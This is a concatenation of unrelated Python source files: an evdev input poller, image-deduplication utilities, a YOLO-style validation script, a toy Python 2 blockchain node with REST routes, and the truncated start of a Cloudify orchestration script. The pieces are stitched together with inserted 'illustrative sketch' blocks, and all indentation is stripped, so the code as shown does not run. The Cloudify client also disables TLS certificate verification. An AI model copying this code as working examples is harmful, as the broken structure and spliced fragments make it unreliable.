if key.fileobj == self._dev: # it's from evdev
for event in cast(Iterator[evdev.InputEvent], self._dev.read()):
consume_event(event)
else: # must be the virtual pipe
rospy.loginfo('Received notification from virtual pipe!')
cast(BytesIO, key.fileobj).read()
# terminate if the device is closed
with self._thread_lock:
if self._dev.fd == -1:
rospy.loginfo('The device was closed! Terminating the evdev thread...')
break
poll_thread = Thread(target=poll)
poll_thread.start()
self._poll_thread_ctx = poll_thread, notify_pipe_w
def get_axis(self, axis: DeviceAxis) -> Optional[float]:
"""Retrieves the state of an absolute axis.
The axis value will be normalized. See the `AxisBuf` class for more details.
Parameters
----------
axis : DeviceAxis
The axis whose state should be queried.
Returns
-------
Optional[float]
The axis' state, or `None` if there is no data available for it.
"""
with self._data_lock:
axis_buf = self._axis_cache.get(axis)
return axis_buf.value if axis_buf is not None else None
def get_key(self, key: DeviceKey) -> Optional[bool]:
"""Retrieves the state of a button.
Parameters
----------
key : DeviceKey
The button whose state should be queried.
Returns
-------
Optional[bool]
The button's state, or `None` if there is no data available for it.
"""
with self._data_lock:
key_buf = self._key_cache.get(key)
return key_buf.value if key_buf is not None else None
def kill(self):
"""Shuts down the device.
This closes any relevant file handles and terminates the polling thread.
The `InputDevice` instance can no longer be used once this is done.
"""
with self._thread_lock:
self._dev.close()
if self._poll_thread_ctx is not None:
os.write(self._poll_thread_ctx[1], b'\0') # write some random byte to break out of the selector read
os.close(self._poll_thread_ctx[1])
self._poll_thread_ctx[0].join()
self._poll_thread_ctx = None
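# Illustrative sketch (not part of the original class): the SYN_REPORT / SYN_DROPPED frame
# handling described in InputDevice.start, expressed as a minimal standalone loop against
# the raw evdev API. The device path is hypothetical; events are buffered per frame and
# only committed (here, printed) when a complete SYN_REPORT arrives, while a SYN_DROPPED
# discards the fragmented frame.
def _frame_loop_sketch(device_path: str = '/dev/input/event0'):
    dev = evdev.InputDevice(device_path)
    pending = {}
    in_sync = True
    for event in dev.read_loop():
        if event.type == DeviceEventType.EV_SYN:
            if event.code == SyncEvent.SYN_REPORT:
                if in_sync and pending:
                    print(pending)  # a complete frame; commit it
                pending.clear()
                in_sync = True
            elif event.code == SyncEvent.SYN_DROPPED:
                pending.clear()  # frame is fragmented; resynchronize on the next frame
                in_sync = False
        elif in_sync:
            pending[(event.type, event.code)] = event.value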
|
util.py
|
from threading import Thread
from time import sleep
import webbrowser
from PIL import Image, ImageChops
import enum
from pathlib import Path
import imagehash
from send2trash import send2trash
def open_browser_tab(url):
def _open_tab():
sleep(1)
webbrowser.open_new_tab(url)
thread = Thread(target=_open_tab)
thread.daemon = True
thread.start()
def trim_image(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
im = im.crop(bbox)
return im
def shrink_image(im, max_width=800):
width, height = im.size
if width > max_width:
im.thumbnail((max_width, int(height * max_width / width)))
return im
def remove_duplicate(file_path):
hashes = set()
for p in Path(file_path).glob('**/*.*'):
if p.suffix.lower() in {'.png', '.jpg', '.jp2', '.jpeg', '.gif'}:
h = imagehash.dhash(trim_image(shrink_image(Image.open(p))))
if h in hashes:
print('Deleting {}'.format(p))
send2trash(p)
else:
hashes.add(h)
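# Illustrative sketch (not part of the original module): imagehash hashes support
# subtraction, which yields the Hamming distance between two perceptual hashes, so two
# files can be compared for near-duplication without being byte-identical. The threshold
# of 4 bits is an arbitrary choice for this example.
def images_look_alike(path_a, path_b, max_distance=4):
    hash_a = imagehash.dhash(trim_image(shrink_image(Image.open(path_a))))
    hash_b = imagehash.dhash(trim_image(shrink_image(Image.open(path_b))))
    return (hash_a - hash_b) <= max_distance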
class HAlign(enum.Enum):
LEFT = -1
CENTER = 0
RIGHT = 1
class VAlign(enum.Enum):
TOP = 1
MIDDLE = 0
BOTTOM = -1
|
val.py
|
import sys
import argparse
from pathlib import Path
from threading import Thread
import torch
import numpy as np
from tqdm import tqdm
from utils.callbacks import Callbacks
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.plots import plot_images, output_to_target
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.torch_utils import select_device, time_sync
from utils.general import check_dataset, check_img_size, check_suffix, check_yaml, box_iou,\
non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
FILE = Path(__file__).resolve()
sys.path.append(FILE.parents[0].as_posix())
def save_one_txt(normed_pred, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain wh x wh
for *xyxy, conf, cls in normed_pred.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized x y w h
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def process_batch(detections, labels, iou_thresholds):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
iou_thresholds: list iou thresholds from 0.5 -> 0.95
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iou_thresholds.shape[0], dtype=torch.bool, device=iou_thresholds.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iou_thresholds[0]) & (labels[:, 0:1] == detections[:, 5]))
if x[0].shape[0]:
# [label, detection, iou]
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy()
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iou_thresholds.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iou_thresholds
return correct
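# Illustrative sketch (not part of the original script): a minimal call to process_batch
# with a single hypothetical detection that exactly covers its ground-truth box, so it is
# counted as correct at every IoU threshold.
def _process_batch_example():
    thresholds = torch.linspace(0.5, 0.95, 10)
    detections = torch.tensor([[0., 0., 10., 10., 0.9, 0.]])  # x1, y1, x2, y2, conf, class
    labels = torch.tensor([[0., 0., 0., 10., 10.]])           # class, x1, y1, x2, y2
    return process_batch(detections, labels, thresholds)      # -> (1, 10) boolean tensor, all True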
def cal_weighted_ap(ap50):
# Class-weighted AP@0.5 with fixed weights: 0.3 for class 0, 0.2 for class 1, 0.5 for class 2.
return 0.2 * ap50[1] + 0.3 * ap50[0] + 0.5 * ap50[2]
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
img_size=640, # inference size (pixels)
conf_threshold=0.001, # confidence threshold
iou_threshold=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
project='results/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
is_loaded_model = model is not None
grid_size = None
if is_loaded_model:
device = next(model.parameters()).device
else:
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok)
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True)
# Load model
check_suffix(weights, '.pt')
model = attempt_load(weights, map_location=device)
grid_size = max(int(model.stride.max()), 32)
img_size = check_img_size(img_size, s=grid_size)
# Data
data = check_dataset(data)
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
num_class = int(data['num_class'])
iou_thresholds = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
num_thresholds = iou_thresholds.numel()
# Dataloader
if not is_loaded_model:
if device.type != 'cpu':
model(torch.zeros(1, 3, img_size, img_size).to(device).type_as(next(model.parameters())))
task = task if task in ('train', 'val', 'test') else 'val'
dataloader = create_dataloader(data[task], img_size, batch_size, grid_size, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
num_per_class = [0] * num_class
confusion_matrix = ConfusionMatrix(nc=num_class)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
s = ('%20s' + '%11s' * 8) % ('Class', 'Images', 'Labels', 'Boxes', 'P', 'R', 'wAP@.5', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map, wap50 = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
stats, ap, ap_class = [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
# Preprocess
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0
for i in range(num_class):
num_per_class[i] += len(np.where(targets[:, 1] == i)[0])
targets = targets.to(device)
batch_size, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
dt[1] += time_sync() - t2
# Compute loss
if compute_loss:
# box, obj, cls
loss += compute_loss([x.float() for x in train_out], targets)[1]
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(batch_size)] if save_hybrid else []
t3 = time_sync()
# Note: NMS reduces each prediction row from the raw 8-value model output to 6 values: x1, y1, x2, y2, conf, class
out = non_max_suppression(out, conf_threshold, iou_threshold, labels=lb, multi_label=True)
dt[2] += time_sync() - t3
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
target_class = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, num_thresholds, dtype=torch.bool),
torch.Tensor(), torch.Tensor(), target_class))
continue
normed_pred = pred.clone()
scale_coords(img[si].shape[1:], normed_pred[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
target_boxes = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], target_boxes, shape, shapes[si][1]) # native-space labels
labels_per_img = torch.cat((labels[:, 0:1], target_boxes), 1) # native-space labels
correct = process_batch(normed_pred, labels_per_img, iou_thresholds)
if plots:
confusion_matrix.process_batch(normed_pred, labels_per_img)
else:
correct = torch.zeros(pred.shape[0], num_thresholds, dtype=torch.bool)
# correct, confidence, pred_label, target_label
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), target_class))
# Save/log
if save_txt:
save_one_txt(normed_pred, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
callbacks.run('on_val_image_end', pred, normed_pred, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)]
# Count detected boxes per class
boxes_per_class = np.bincount(stats[2].astype(np.int64), minlength=num_class)
ap50 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, wap50, map50, map = p.mean(), r.mean(), cal_weighted_ap(ap50), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=num_class) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
print_format = '%20s' + '%11i' * 3 + '%11.3g' * 5 # print format
print(print_format % ('all', seen, nt.sum(), sum(boxes_per_class), mp, mr, wap50, map50, map))
# Print results per class
if (verbose or (num_class < 50 and not is_loaded_model)) and num_class > 1 and len(stats):
for i, c in enumerate(ap_class):
print(print_format % (names[c], num_per_class[c], nt[c],
boxes_per_class[c], p[i], r[i], ap50[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt)
if not is_loaded_model:
shape = (batch_size, 3, img_size, img_size)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Return results
model.float()
if not is_loaded_model:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(num_class) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, wap50, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parser():
args = argparse.ArgumentParser(prog='val.py')
args.add_argument('--data', type=str, default='config/data_cfg.yaml', help='dataset.yaml path')
args.add_argument('--weights', type=str, help='specify your weight path', required=True)
args.add_argument('--task', help='train, val, test', required=True)
args.add_argument('--name', help='save to project/name', required=True)
args.add_argument('--batch-size', type=int, default=64, help='batch size')
args.add_argument('--device', default='cpu', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
args = args.parse_args()
args.img_size = 640
args.conf_threshold = 0.001
args.iou_threshold = 0.6
args.augment = False
args.exist_ok = False
args.half = False
args.project = 'results/evaluate/' + args.task
args.save_conf = False
args.save_hybrid = False
args.save_txt = False
args.verbose = False
args.plots = True
args.save_txt |= args.save_hybrid
args.data = check_yaml(args.data)
return args
def main(args):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(args).items()))
if args.task in ('train', 'val', 'test'): # run normally
run(**vars(args))
if __name__ == "__main__":
main(parser())
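# Illustrative usage (not part of the original script; the checkpoint path is hypothetical):
#   python val.py --data config/data_cfg.yaml --weights runs/train/exp/best.pt --task val --name demo
#   python val.py --data config/data_cfg.yaml --weights runs/train/exp/best.pt --task test --name demo --device 0 --batch-size 32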
|
node.py
|
import grequests
import requests
from blockchain import *
from klein import Klein
FULL_NODE_PORT = "30013"
NODES_URL = "http://{}:{}/nodes"
TRANSACTIONS_URL = "http://{}:{}/transactions"
BLOCK_URL = "http://{}:{}/block/{}"
BLOCKS_RANGE_URL = "http://{}:{}/blocks/{}/{}"
BLOCKS_URL = "http://{}:{}/blocks"
TRANSACTION_HISTORY_URL = "http://{}:{}/address/{}/transactions"
BALANCE_URL = "http://{}:{}/address/{}/balance"
class NodeMixin(object):
# TODO: store the nodes in an external configuration file
full_nodes = {"127.0.0.1"}
def request_nodes(self, node, port):
url = NODES_URL.format(node, port)
try:
response = requests.get(url)
if response.status_code == 200:
all_nodes = response.json()
return all_nodes
except requests.exceptions.RequestException as re:
pass
return None
def request_nodes_from_all(self):
full_nodes = self.full_nodes.copy()
bad_nodes = set()
for node in full_nodes:
all_nodes = self.request_nodes(node, FULL_NODE_PORT)
if all_nodes is not None:
full_nodes = full_nodes.union(all_nodes["full_nodes"])
else:
bad_nodes.add(node)
self.full_nodes = full_nodes
for node in bad_nodes:
self.remove_node(node)
return
def remove_node(self, node):
self.full_nodes.discard(node)
def broadcast_transaction(self, transaction):
self.request_nodes_from_all()
bad_nodes = set()
data = {
"transaction": transaction
}
for node in self.full_nodes:
url = TRANSACTIONS_URL.format(node, FULL_NODE_PORT)
try:
response = requests.post(url, json=data)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return
# TODO: convert to grequests and return a list of responses
class FullNode(NodeMixin):
NODE_TYPE = "full"
blockchain = None
app = Klein()
def __init__(self, host, reward_address, block_path=None):
self.host = host
self.request_nodes_from_all()
self.reward_address = reward_address
self.broadcast_node(host)
self.full_nodes.add(host)
if block_path is None:
self.blockchain = Blockchain()
else:
self.load_blockchain(block_path)
thread = threading.Thread(target=self.mine, args=())
thread.daemon = True
thread.start()
print "\n\nfull node server started...\n\n"
self.app.run(host, FULL_NODE_PORT)
def request_block(self, node, port, index="latest"):
url = BLOCK_URL.format(node, port, index)
try:
response = requests.get(url)
if response.status_code == 200:
block_dict = json.loads(response.json())
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
return block
except requests.exceptions.RequestException as re:
pass
return None
def request_block_from_all(self, index="latest"):
blocks = []
full_nodes = self.full_nodes.copy()
bad_nodes = set()
for node in full_nodes:
block = self.request_block(node, FULL_NODE_PORT, index)
if block is not None:
blocks.append(block)
else:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
return blocks
def request_blocks_range(self, node, port, start_index, stop_index):
url = BLOCKS_RANGE_URL.format(node, port, start_index, stop_index)
blocks = []
try:
response = requests.get(url)
if response.status_code == 200:
blocks_dict = json.loads(response.json())
for block_dict in blocks_dict:
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
blocks.append(block)
return blocks
except requests.exceptions.RequestException as re:
pass
return None
def request_blockchain(self, node, port):
url = BLOCKS_URL.format(node, port)
blocks = []
try:
response = requests.get(url)
if response.status_code == 200:
blocks_dict = json.loads(response.json())
for block_dict in blocks_dict:
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
blocks.append(block)
return blocks
except requests.exceptions.RequestException as re:
pass
return None
def mine(self):
print "\n\nmining started...\n\n"
while True:
latest_block = self.blockchain.get_latest_block()
latest_hash = latest_block.current_hash
latest_index = latest_block.index
block = self.blockchain.mine_block(self.reward_address)
if not block:
continue
statuses = self.broadcast_block(block)
if statuses['expirations'] > statuses['confirmations'] or \
statuses['invalidations'] > statuses['confirmations']:
self.synchronize()
new_latest_block = self.blockchain.get_latest_block()
if latest_hash != new_latest_block.current_hash or \
latest_index != new_latest_block.index:
#latest_block changed after sync.. don't add the block.
self.blockchain.recycle_transactions(block)
continue
self.blockchain.add_block(block)
def broadcast_block(self, block):
#TODO convert to grequests and concurrently gather a list of responses
statuses = {
"confirmations": 0,
"invalidations": 0,
"expirations": 0
}
self.request_nodes_from_all()
bad_nodes = set()
data = {
"block": block.to_json(),
"host": self.host
}
for node in self.full_nodes:
if node == self.host:
continue
url = BLOCKS_URL.format(node, FULL_NODE_PORT)
try:
response = requests.post(url, json=data)
if response.status_code == 202:
# confirmed and accepted by node
statuses["confirmations"] += 1
elif response.status_code == 406:
# invalidated and rejected by node
statuses["invalidations"] += 1
elif response.status_code == 409:
# expired and rejected by node
statuses["expirations"] += 1
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return statuses
def add_node(self, host):
if host == self.host:
return
if host not in self.full_nodes:
self.broadcast_node(host)
self.full_nodes.add(host)
def broadcast_node(self, host):
self.request_nodes_from_all()
bad_nodes = set()
data = {
"host": host
}
for node in self.full_nodes:
if node == self.host:
continue
url = NODES_URL.format(node, FULL_NODE_PORT)
try:
requests.post(url, json=data)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return
def load_blockchain(self, block_path):
# TODO load blockchain from path
pass
def synchronize(self):
my_latest_block = self.blockchain.get_latest_block()
"""
latest_blocks = {
index1 : {
current_hash1 : [node1, node2],
current_hash2 : [node3]
},
index2 : {
current_hash3 : [node4]
}
}
"""
latest_blocks = {}
self.request_nodes_from_all()
bad_nodes = set()
for node in self.full_nodes:
url = BLOCK_URL.format(node, FULL_NODE_PORT, "latest")
try:
response = requests.get(url)
if response.status_code == 200:
remote_latest_block = response.json()
if remote_latest_block["index"] <= my_latest_block.index:
continue
if latest_blocks.get(remote_latest_block["index"], None) is None:
latest_blocks[remote_latest_block["index"]] = {
remote_latest_block["current_hash"]: [node]
}
continue
if latest_blocks[remote_latest_block["index"]].get(remote_latest_block["current_hash"], None) is None:
latest_blocks[remote_latest_block["index"]][remote_latest_block["current_hash"]] = [node]
continue
latest_blocks[remote_latest_block["index"]][remote_latest_block["current_hash"]].append(node)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
if len(latest_blocks) > 0:
for latest_block in sorted(latest_blocks.items(), reverse=True):
index = latest_block[0]
current_hashes = latest_block[1]
success = True
for current_hash, nodes in current_hashes.items():
remote_host = nodes[0]
remote_diff_blocks = self.request_blocks_range(
remote_host,
FULL_NODE_PORT,
my_latest_block.index + 1,
index
)
if remote_diff_blocks[0].previous_hash == my_latest_block.current_hash:
# first block in diff blocks fit local chain
for block in remote_diff_blocks:
result = self.blockchain.add_block(block)
if not result:
success = False
break
else:
# first block in diff blocks does not fit local chain
for i in range(my_latest_block.index, 1, -1):
# step backwards and look for the first remote block that fits the local chain
block = self.request_block(remote_host, FULL_NODE_PORT, str(i))
remote_diff_blocks[0:0] = [block]
if block.previous_hash == self.blockchain.get_block_by_index(i-1).current_hash:
# found the fork
result = self.blockchain.alter_chain(remote_diff_blocks)
success = result
break
success = False
if success:
break
if success:
break
return
@app.route('/nodes', methods=['POST'])
def post_node(self, request):
body = json.loads(request.content.read())
self.add_node(body['host'])
return json.dumps({'success': True})
@app.route('/nodes', methods=['GET'])
def get_nodes(self, request):
nodes = {
"full_nodes": list(self.full_nodes)
}
return json.dumps(nodes)
@app.route('/transactions', methods=['POST'])
def post_transactions(self, request):
body = json.loads(request.content.read())
return json.dumps({'success': self.blockchain.push_unconfirmed_transaction(body['transaction'])})
@app.route('/transactions', methods=['GET'])
def get_transactions(self, request):
return json.dumps(self.blockchain.get_all_unconfirmed_transactions())
@app.route('/address/<address>/balance', methods=['GET'])
def get_balance(self, request, address):
return json.dumps(self.blockchain.get_balance(address))
@app.route('/address/<address>/transactions', methods=['GET'])
def get_transaction_history(self, request, address):
return json.dumps(self.blockchain.get_transaction_history(address))
@app.route('/blocks', methods=['POST'])
def post_block(self, request):
body = json.loads(request.content.read())
remote_block = json.loads(body['block'])
remote_host = body['host']
block = Block(
remote_block['index'],
remote_block['transactions'],
remote_block['previous_hash'],
remote_block['current_hash'],
remote_block['timestamp'],
remote_block['nonce']
)
my_latest_block = self.blockchain.get_latest_block()
if block.index > my_latest_block.index + 1:
# new block index is greater than ours
remote_diff_blocks = self.request_blocks_range(
remote_host,
FULL_NODE_PORT,
my_latest_block.index + 1,
remote_block['index']
)
if remote_diff_blocks[0].previous_hash == my_latest_block.current_hash:
# first block in diff blocks fit local chain
for block in remote_diff_blocks:
result = self.blockchain.add_block(block)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'block {} rejected'.format(block.index)})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
else:
# first block in diff blocks does not fit local chain
for i in range(my_latest_block.index, 1, -1):
# step backwards and look for the first remote block that fits the local chain
block = self.request_block(remote_host, FULL_NODE_PORT, str(i))
remote_diff_blocks[0:0] = [block]
if block.previous_hash == self.blockchain.get_block_by_index(i-1).current_hash:
# found the fork
result = self.blockchain.alter_chain(remote_diff_blocks)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'blocks rejected'})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'blocks rejected'})
elif block.index <= my_latest_block.index:
# new block index is less than ours
request.setResponseCode(409) # conflict
return json.dumps({'message': 'Block index too low. Fetch latest chain.'})
# correct block index. verify txs, hash
result = self.blockchain.add_block(block)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'block {} rejected'.format(block.index)})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
@app.route('/blocks', methods=['GET'])
def get_blocks(self, request):
return json.dumps([block.__dict__ for block in self.blockchain.get_all_blocks()])
@app.route('/blocks/<start_block_id>/<end_block_id>', methods=['GET'])
def get_blocks_range(self, request, start_block_id, end_block_id):
return json.dumps([block.__dict__ for block in self.blockchain.get_blocks_range(start_block_id, end_block_id)])
@app.route('/block/<block_id>', methods=['GET'])
def get_block(self, request, block_id):
if block_id == "latest":
return json.dumps(self.blockchain.get_latest_block().__dict__)
return json.dumps(self.blockchain.get_block_by_index(block_id).__dict__)
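# Illustrative sketch (not part of the original node): querying a running full node's REST
# API from a separate client, for a hypothetical host. The endpoint mirrors the Klein
# routes defined above.
def fetch_latest_block(host="127.0.0.1"):
    try:
        response = requests.get(BLOCK_URL.format(host, FULL_NODE_PORT, "latest"))
        if response.status_code == 200:
            return response.json()  # dict with index, transactions, previous_hash, current_hash, ...
    except requests.exceptions.RequestException:
        pass
    return None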
if __name__ == "__main__":
pass
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check whether a mapping exists for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and concerns SELF, just get the attribute of the mapped attribute name.
# Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute {0} not found, moving up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property {0} not found, moving up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
